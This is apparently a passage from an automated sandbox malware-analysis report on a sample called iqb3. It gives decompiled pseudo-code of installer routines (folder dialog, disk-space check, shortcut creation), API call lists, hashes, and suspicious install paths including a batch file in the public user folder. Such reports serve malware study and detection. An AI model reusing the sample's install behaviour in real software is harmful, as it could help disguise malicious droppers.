                                                                      0x00404cf7
                                                                      0x00404cfc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404d0e
                                                                      0x00404d13
                                                                      0x00404d1f
                                                                      0x00404d1f
                                                                      0x00404d21
                                                                      0x00404d30
                                                                      0x00404d32
                                                                      0x00404d36
                                                                      0x00404d39
                                                                      0x00000000
                                                                      0x00404d39
                                                                      0x00404cd7
                                                                      0x00404998
                                                                      0x0040499d
                                                                      0x004049a6
                                                                      0x004049ad
                                                                      0x004049bb
                                                                      0x004049c6
                                                                      0x004049cc
                                                                      0x004049da
                                                                      0x004049ee
                                                                      0x004049f3
                                                                      0x00404a00
                                                                      0x00404a05
                                                                      0x00404a1b
                                                                      0x00404a2c
                                                                      0x00404a39
                                                                      0x00404a39
                                                                      0x00404a3c
                                                                      0x00404a42
                                                                      0x00404a44
                                                                      0x00404a47
                                                                      0x00404a4c
                                                                      0x00404a51
                                                                      0x00404a53
                                                                      0x00404a53
                                                                      0x00404a73
                                                                      0x00404a73
                                                                      0x00404a75
                                                                      0x00404a76
                                                                      0x00404a7b
                                                                      0x00404a7e
                                                                      0x00404a81
                                                                      0x00404a85
                                                                      0x00404a8a
                                                                      0x00404a8f
                                                                      0x00404a93
                                                                      0x00404a98
                                                                      0x00404a9d
                                                                      0x00404a9f
                                                                      0x00404aa7
                                                                      0x00404b71
                                                                      0x00404b84
                                                                      0x00000000
                                                                      0x00404aad
                                                                      0x00404ab0
                                                                      0x00404ab3
                                                                      0x00404ab6
                                                                      0x00404ab6
                                                                      0x00404abc
                                                                      0x00404ac2
                                                                      0x00404ac5
                                                                      0x00404acb
                                                                      0x00404acc
                                                                      0x00404ad1
                                                                      0x00404ada
                                                                      0x00404ae1
                                                                      0x00404ae4
                                                                      0x00404ae7
                                                                      0x00404aea
                                                                      0x00404b26
                                                                      0x00404b47
                                                                      0x00404b49
                                                                      0x00404b4f
                                                                      0x00404b28
                                                                      0x00404b35
                                                                      0x00404b35
                                                                      0x00404aec
                                                                      0x00404aef
                                                                      0x00404afe
                                                                      0x00404b08
                                                                      0x00404b0a
                                                                      0x00404b10
                                                                      0x00404b17
                                                                      0x00404b1a
                                                                      0x00404b1f
                                                                      0x00404b1f
                                                                      0x00404aea
                                                                      0x00404b55
                                                                      0x00404b56
                                                                      0x00404b62
                                                                      0x00404b62
                                                                      0x00404b6f
                                                                      0x00404b8a
                                                                      0x00404b8e
                                                                      0x00404bab
                                                                      0x00404bb0
                                                                      0x00000000
                                                                      0x00404b90
                                                                      0x00404b95
                                                                      0x00404b9e
                                                                      0x00404f28
                                                                      0x00404f3a
                                                                      0x00404f3a
                                                                      0x00404b8e
                                                                      0x00000000
                                                                      0x00404b6f
                                                                      0x00404aa7

                                                                      APIs
                                                                      • GetDlgItem.USER32 ref: 0040495E
                                                                      • GetDlgItem.USER32 ref: 00404969
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 004049B3
                                                                      • LoadBitmapA.USER32 ref: 004049C6
                                                                      • SetWindowLongA.USER32(?,000000FC,00404F3D), ref: 004049DF
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004049F3
                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A05
                                                                      • SendMessageA.USER32(?,00001109,00000002), ref: 00404A1B
                                                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A27
                                                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A39
                                                                      • DeleteObject.GDI32(00000000), ref: 00404A3C
                                                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A67
                                                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A73
                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B08
                                                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B33
                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B47
                                                                      • GetWindowLongA.USER32 ref: 00404B76
                                                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B84
                                                                      • ShowWindow.USER32(?,00000005), ref: 00404B95
                                                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C92
                                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404CF7
                                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D0C
                                                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D30
                                                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D50
                                                                      • ImageList_Destroy.COMCTL32(00000000), ref: 00404D65
                                                                      • GlobalFree.KERNEL32 ref: 00404D75
                                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404DEE
                                                                      • SendMessageA.USER32(?,00001102,?,?), ref: 00404E97
                                                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EA6
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EC6
                                                                      • ShowWindow.USER32(?,00000000), ref: 00404F14
                                                                      • GetDlgItem.USER32 ref: 00404F1F
                                                                      • ShowWindow.USER32(00000000), ref: 00404F26
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                      • String ID: $M$N
                                                                      • API String ID: 1638840714-813528018
                                                                      • Opcode ID: 11184b33c8a0bad0ffedf065af9fcd562555c30c73c025eae7e35ea36ad120a5
                                                                      • Instruction ID: 32328689aaf225a856d9d5e8400e1324cb9f7a0d0133e9a7d6c98aba065e8d61
                                                                      • Opcode Fuzzy Hash: 11184b33c8a0bad0ffedf065af9fcd562555c30c73c025eae7e35ea36ad120a5
                                                                      • Instruction Fuzzy Hash: 5D0270B0900209AFEB20DF54DD45AAE7BB5FB84315F10817AF610BA2E1D7789D42DF58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040440A Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 268stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 83%
                                                                      			E0040440A(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				struct HWND__* _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t78;
				long _t83;
				signed char* _t85;
				void* _t91;
				signed int _t92;
				signed char _t110;
				signed int _t114;
				struct HWND__** _t118;
				intOrPtr* _t134;
				CHAR* _t142;
				intOrPtr _t144;
				signed char _t145;
				signed int _t146;
				signed int _t150;
				signed int* _t152;
				signed int _t153;
				signed char* _t154;
				struct HWND__* _t159;
				struct HWND__* _t160;
				int _t162;
				intOrPtr _t198;

				_t78 =  *0x41f4b8; // 0x56f0e4
				_v36 = _t78;
				_t142 = ( *(_t78 + 0x3c) << 0xa) + 0x424000;
				_v12 =  *((intOrPtr*)(_t78 + 0x38));
				if(_a8 == 0x40b) {
					E004054D6(0x3fb, _t142);
					E00405F49(_t142);
				}
				_t160 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004054D6(0x3fb, _t142);
							if(E0040585C(_t179, _t142) == 0) {
								_v8 = 1;
							}
							E00405CDE(0x41ecb0, _t142);
							_t152 = 0;
							_t83 = E00406009(0);
							_v16 = _t83;
							if(_t83 == 0 || 0 == 0x41ecb0) {
								L30:
								E00405CDE(0x41ecb0, _t142);
								_t85 = E00405807(0x41ecb0);
								if(_t85 != 0) {
									 *_t85 =  *_t85 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41ecb0,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L36;
								} else {
									_t162 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L37;
								}
							} else {
								while(1) {
									_t110 = _v16(0x41ecb0,  &_v44,  &_v32,  &_v24);
									if(_t110 != 0) {
										break;
									}
									if(_t152 != 0) {
										 *_t152 =  *_t152 & _t110;
									}
									_t154 = E004057B5(0x41ecb0);
									 *_t154 =  *_t154 & 0x00000000;
									_t152 = _t154 - 1;
									 *_t152 = 0x5c;
									if(_t152 != 0x41ecb0) {
										continue;
									} else {
										goto L30;
									}
								}
								_v16 = 0xa;
								_t145 = _v16;
								_t150 = _v40;
								_v40 = _t150 >> _t145;
								_t153 = (_t150 << 0x00000020 | _v44) >> _t145;
								_v12 = 1;
								L36:
								_t162 = 0x400;
								L37:
								_t91 = E00404867(5);
								if(_v12 != 0 && _t153 < _t91) {
									_v8 = 2;
								}
								_t144 =  *0x422ebc; // 0x5707f3
								if( *((intOrPtr*)(_t144 + 0x10)) != 0) {
									E004047B2(0x3ff, 0xfffffffb, _t91);
									if(_v12 == 0) {
										SetDlgItemTextA(_a4, _t162, 0x41eca0);
									} else {
										E004047B2(_t162, 0xfffffffc, _t153);
									}
								}
								_t92 = _v8;
								 *0x423784 = _t92;
								if(_t92 == 0) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t162) != 0) {
									_v8 = 0;
								}
								E00403FEE(0 | _v8 == 0x00000000);
								if(_v8 == 0) {
									_t198 =  *0x41fcd0; // 0x0
									if(_t198 == 0) {
										E0040439F();
									}
								}
								 *0x41fcd0 = 0;
								goto L52;
							}
						}
						_t179 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L52;
						}
						goto L22;
					}
					_t114 = _a12 & 0x0000ffff;
					if(_t114 != 0x3fb) {
						L12:
						if(_t114 == 0x3e9) {
							_t146 = 7;
							memset( &_v72, 0, _t146 << 2);
							_v76 = _t160;
							_v68 = 0x41fce0;
							_v56 = E0040474C;
							_v52 = _t142;
							_v64 = E00405D00(_t142, 0x41fce0, _t160, 0x41f0b8, _v12);
							_t118 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t118);
							if(_t118 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t118);
								E0040576E(_t142);
								_t121 =  *((intOrPtr*)( *0x4236f0 + 0x11c));
								if( *((intOrPtr*)( *0x4236f0 + 0x11c)) != 0 && _t142 == "C:\\Users\\engineer\\Vkstcentrene\\unprotuberant") {
									E00405D00(_t142, 0x41fce0, _t160, 0, _t121);
									if(lstrcmpiA(0x422680, 0x41fce0) != 0) {
										lstrcatA(_t142, 0x422680);
									}
								}
								 *0x41fcd0 =  *0x41fcd0 + 1;
								SetDlgItemTextA(_t160, 0x3fb, _t142);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L52;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = GetDlgItem(_t160, 0x3fb);
					if(E004057DB(_t142) != 0 && E00405807(_t142) == 0) {
						E0040576E(_t142);
					}
					 *0x422eb8 = _t160;
					SetWindowTextA(_t159, _t142);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403FCC(_t160);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403FCC(_t160);
					E00404001(_t159);
					_t134 = E00406009(7);
					if(_t134 == 0) {
						L52:
						return E00404033(_a8, _a12, _a16);
					} else {
						 *_t134(_t159, 1);
						goto L8;
					}
				}
			}












































                                                                      0x00404410
                                                                      0x00404416
                                                                      0x00404423
                                                                      0x00404431
                                                                      0x00404434
                                                                      0x0040443c
                                                                      0x00404442
                                                                      0x00404442
                                                                      0x0040444e
                                                                      0x00404451
                                                                      0x004044bf
                                                                      0x004044c6
                                                                      0x0040459d
                                                                      0x004045a4
                                                                      0x004045b3
                                                                      0x004045b3
                                                                      0x004045b7
                                                                      0x004045c1
                                                                      0x004045ce
                                                                      0x004045d0
                                                                      0x004045d0
                                                                      0x004045de
                                                                      0x004045e3
                                                                      0x004045e6
                                                                      0x004045ed
                                                                      0x004045f0
                                                                      0x00404625
                                                                      0x00404627
                                                                      0x0040462d
                                                                      0x00404634
                                                                      0x00404636
                                                                      0x00404636
                                                                      0x00404652
                                                                      0x00404699
                                                                      0x00000000
                                                                      0x00404654
                                                                      0x00404657
                                                                      0x0040466b
                                                                      0x0040466d
                                                                      0x00000000
                                                                      0x0040466d
                                                                      0x004045f8
                                                                      0x004045f8
                                                                      0x00404605
                                                                      0x0040460a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040460e
                                                                      0x00404610
                                                                      0x00404610
                                                                      0x00404618
                                                                      0x0040461a
                                                                      0x0040461d
                                                                      0x00404620
                                                                      0x00404623
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404623
                                                                      0x00404676
                                                                      0x0040467d
                                                                      0x00404683
                                                                      0x0040468b
                                                                      0x0040468e
                                                                      0x00404690
                                                                      0x0040469c
                                                                      0x0040469c
                                                                      0x004046a1
                                                                      0x004046a3
                                                                      0x004046ad
                                                                      0x004046b3
                                                                      0x004046b3
                                                                      0x004046ba
                                                                      0x004046c3
                                                                      0x004046cd
                                                                      0x004046d5
                                                                      0x004046eb
                                                                      0x004046d7
                                                                      0x004046db
                                                                      0x004046db
                                                                      0x004046d5
                                                                      0x004046f0
                                                                      0x004046f5
                                                                      0x004046fa
                                                                      0x00404703
                                                                      0x00404703
                                                                      0x0040470c
                                                                      0x0040470e
                                                                      0x0040470e
                                                                      0x0040471a
                                                                      0x00404722
                                                                      0x00404724
                                                                      0x0040472a
                                                                      0x0040472c
                                                                      0x0040472c
                                                                      0x0040472a
                                                                      0x00404731
                                                                      0x00000000
                                                                      0x00404731
                                                                      0x004045f0
                                                                      0x004045a6
                                                                      0x004045ad
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004045ad
                                                                      0x004044cc
                                                                      0x004044d5
                                                                      0x004044ef
                                                                      0x004044f4
                                                                      0x004044fe
                                                                      0x00404505
                                                                      0x00404511
                                                                      0x00404514
                                                                      0x00404517
                                                                      0x0040451e
                                                                      0x00404526
                                                                      0x00404529
                                                                      0x0040452d
                                                                      0x00404534
                                                                      0x0040453c
                                                                      0x00404596
                                                                      0x0040453e
                                                                      0x0040453f
                                                                      0x00404546
                                                                      0x00404550
                                                                      0x00404558
                                                                      0x00404565
                                                                      0x00404579
                                                                      0x0040457d
                                                                      0x0040457d
                                                                      0x00404579
                                                                      0x00404582
                                                                      0x0040458f
                                                                      0x0040458f
                                                                      0x0040453c
                                                                      0x00000000
                                                                      0x004044f4
                                                                      0x004044e2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004044e8
                                                                      0x00000000
                                                                      0x00404453
                                                                      0x00404460
                                                                      0x00404469
                                                                      0x00404476
                                                                      0x00404476
                                                                      0x0040447d
                                                                      0x00404483
                                                                      0x0040448c
                                                                      0x0040448f
                                                                      0x00404492
                                                                      0x0040449a
                                                                      0x0040449d
                                                                      0x004044a0
                                                                      0x004044a6
                                                                      0x004044ad
                                                                      0x004044b4
                                                                      0x00404737
                                                                      0x00404749
                                                                      0x004044ba
                                                                      0x004044bd
                                                                      0x00000000
                                                                      0x004044bd
                                                                      0x004044b4

                                                                      APIs
                                                                      • GetDlgItem.USER32 ref: 00404459
                                                                      • SetWindowTextA.USER32(00000000,?), ref: 00404483
                                                                      • SHBrowseForFolderA.SHELL32(?,0041F0B8,?), ref: 00404534
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0040453F
                                                                      • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,Bogtilrettelgnings82 Setup: Installing,00000000,?,?), ref: 00404571
                                                                      • lstrcatA.KERNEL32(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 0040457D
                                                                      • SetDlgItemTextA.USER32 ref: 0040458F
                                                                        • Part of subcall function 004054D6: GetDlgItemTextA.USER32 ref: 004054E9
                                                                        • Part of subcall function 00405F49: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\Public\iqb3.bat" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,746AFA90,004033C9), ref: 00405FA1
                                                                        • Part of subcall function 00405F49: CharNextA.USER32(?,?,?,00000000), ref: 00405FAE
                                                                        • Part of subcall function 00405F49: CharNextA.USER32(?,"C:\Users\Public\iqb3.bat" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,746AFA90,004033C9), ref: 00405FB3
                                                                        • Part of subcall function 00405F49: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,746AFA90,004033C9), ref: 00405FC3
                                                                      • GetDiskFreeSpaceA.KERNEL32(0041ECB0,?,?,0000040F,?,0041ECB0,0041ECB0,?,00000000,0041ECB0,?,?,000003FB,?), ref: 0040464A
                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404665
                                                                      • SetDlgItemTextA.USER32 ref: 004046EB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                      • String ID: A$Bogtilrettelgnings82 Setup: Installing$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade$C:\Users\user\Vkstcentrene\unprotuberant
                                                                      • API String ID: 2246997448-3052218581
                                                                      • Opcode ID: 99c887e1a025992634fa2cd334c38f52200385e1e80dd5a9bae78a5bdda81e84
                                                                      • Instruction ID: 42693497c20c2ef9f3724f7af4168125946a8ca29daa8f58ebac9689f75dac72
                                                                      • Opcode Fuzzy Hash: 99c887e1a025992634fa2cd334c38f52200385e1e80dd5a9bae78a5bdda81e84
                                                                      • Instruction Fuzzy Hash: B49170B1900209ABDB11AFA1CD85BAF77B8EF85314F10847BF701B62C1D77C9A418B69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 74%
                                                                      			E00402036() {
				void* _t49;
				intOrPtr* _t53;
				intOrPtr* _t55;
				intOrPtr* _t57;
				signed int _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t76;
				int _t79;
				intOrPtr* _t91;
				intOrPtr* _t98;
				void* _t101;
				void* _t102;

				 *(_t102 - 0x30) = E004029FD(0xfffffff0);
				 *(_t102 - 0x34) = E004029FD(0xffffffdf);
				 *((intOrPtr*)(_t102 - 0x2c)) = E004029FD(2);
				_t98 = E004029FD(0xffffffcd);
				 *((intOrPtr*)(_t102 - 0x44)) = E004029FD(0x45);
				if(E004057DB( *(_t102 - 0x34)) == 0) {
					E004029FD(0x21);
				}
				_t49 = _t102 + 8;
				__imp__CoCreateInstance(0x407384, _t79, 1, 0x407374, _t49);
				if(_t49 < _t79) {
					L15:
					 *((intOrPtr*)(_t102 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t53 =  *((intOrPtr*)(_t102 + 8));
					_t101 =  *((intOrPtr*)( *_t53))(_t53, 0x407394, _t102 - 8);
					if(_t101 >= _t79) {
						_t57 =  *((intOrPtr*)(_t102 + 8));
						_t101 =  *((intOrPtr*)( *_t57 + 0x50))(_t57,  *(_t102 - 0x34));
						if(( *(_t102 - 0x13) & 0x00000080) == 0) {
							_t76 =  *((intOrPtr*)(_t102 + 8));
							 *((intOrPtr*)( *_t76 + 0x24))(_t76, "C:\\Users\\engineer\\Vkstcentrene\\unprotuberant\\Benediktinerklostrets\\Rehandles\\Abortionist\\Korses");
						}
						_t61 =  *(_t102 - 0x14) >> 0x00000008 & 0x0000007f;
						if(_t61 != 0) {
							_t91 =  *((intOrPtr*)(_t102 + 8));
							 *((intOrPtr*)( *_t91 + 0x3c))(_t91, _t61);
						}
						_t62 =  *((intOrPtr*)(_t102 + 8));
						 *((intOrPtr*)( *_t62 + 0x34))(_t62,  *(_t102 - 0x14) >> 0x10);
						if( *_t98 != _t79) {
							_t73 =  *((intOrPtr*)(_t102 + 8));
							 *((intOrPtr*)( *_t73 + 0x44))(_t73, _t98,  *(_t102 - 0x14) & 0x000000ff);
						}
						_t64 =  *((intOrPtr*)(_t102 + 8));
						 *((intOrPtr*)( *_t64 + 0x2c))(_t64,  *((intOrPtr*)(_t102 - 0x2c)));
						_t66 =  *((intOrPtr*)(_t102 + 8));
						 *((intOrPtr*)( *_t66 + 0x1c))(_t66,  *((intOrPtr*)(_t102 - 0x44)));
						if(_t101 >= _t79) {
							_t101 = 0x80004005;
							if(MultiByteToWideChar(_t79, _t79,  *(_t102 - 0x30), 0xffffffff,  *(_t102 - 0x34), 0x400) != 0) {
								_t71 =  *((intOrPtr*)(_t102 - 8));
								_t101 =  *((intOrPtr*)( *_t71 + 0x18))(_t71,  *(_t102 - 0x34), 1);
							}
						}
						_t68 =  *((intOrPtr*)(_t102 - 8));
						 *((intOrPtr*)( *_t68 + 8))(_t68);
					}
					_t55 =  *((intOrPtr*)(_t102 + 8));
					 *((intOrPtr*)( *_t55 + 8))(_t55);
					if(_t101 >= _t79) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t102 - 4));
				return 0;
			}




















                                                                      0x0040203f
                                                                      0x00402049
                                                                      0x00402053
                                                                      0x0040205d
                                                                      0x00402067
                                                                      0x00402071
                                                                      0x00402075
                                                                      0x00402075
                                                                      0x0040207a
                                                                      0x0040208b
                                                                      0x00402093
                                                                      0x00402173
                                                                      0x00402173
                                                                      0x0040217a
                                                                      0x00402099
                                                                      0x00402099
                                                                      0x004020aa
                                                                      0x004020ae
                                                                      0x004020b4
                                                                      0x004020c4
                                                                      0x004020c6
                                                                      0x004020c8
                                                                      0x004020d3
                                                                      0x004020d3
                                                                      0x004020dc
                                                                      0x004020df
                                                                      0x004020e1
                                                                      0x004020e8
                                                                      0x004020e8
                                                                      0x004020ee
                                                                      0x004020f8
                                                                      0x004020fd
                                                                      0x00402102
                                                                      0x00402110
                                                                      0x00402110
                                                                      0x00402113
                                                                      0x0040211c
                                                                      0x0040211f
                                                                      0x00402128
                                                                      0x0040212d
                                                                      0x00402134
                                                                      0x0040214b
                                                                      0x0040214d
                                                                      0x0040215b
                                                                      0x0040215b
                                                                      0x0040214b
                                                                      0x0040215d
                                                                      0x00402163
                                                                      0x00402163
                                                                      0x00402166
                                                                      0x0040216c
                                                                      0x00402171
                                                                      0x00402186
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402171
                                                                      0x0040217c
                                                                      0x00402895
                                                                      0x004028a1

                                                                      APIs
                                                                      • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208B
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407374,?,?), ref: 00402143
                                                                      Strings
                                                                      • C:\Users\user\Vkstcentrene\unprotuberant\Benediktinerklostrets\Rehandles\Abortionist\Korses, xrefs: 004020CB
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                                      • String ID: C:\Users\user\Vkstcentrene\unprotuberant\Benediktinerklostrets\Rehandles\Abortionist\Korses
                                                                      • API String ID: 123533781-3637290404
                                                                      • Opcode ID: 729bbdcfb833e55362a4fa264fd64119e5fa5037f146b723465f27495cde836d
                                                                      • Instruction ID: 06e6b23027def8a4d5e6b724cf519ff4addaa20e67256fcdff0c37d24eef8e92
                                                                      • Opcode Fuzzy Hash: 729bbdcfb833e55362a4fa264fd64119e5fa5037f146b723465f27495cde836d
                                                                      • Instruction Fuzzy Hash: EA417D71A00209BFCB00EFA4CE88E9E7BB5BF48354B2042A9F911FB2D0D6799D41DB54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402645 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 39%
                                                                      			E00402645(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029FD(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405C3C(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405CDE();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                      0x0040265d
                                                                      0x00402671
                                                                      0x0040267c
                                                                      0x0040267d
                                                                      0x004027b8
                                                                      0x0040265f
                                                                      0x0040265f
                                                                      0x00402661
                                                                      0x00402663
                                                                      0x00402663
                                                                      0x00402895
                                                                      0x004028a1

                                                                      APIs
                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402654
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
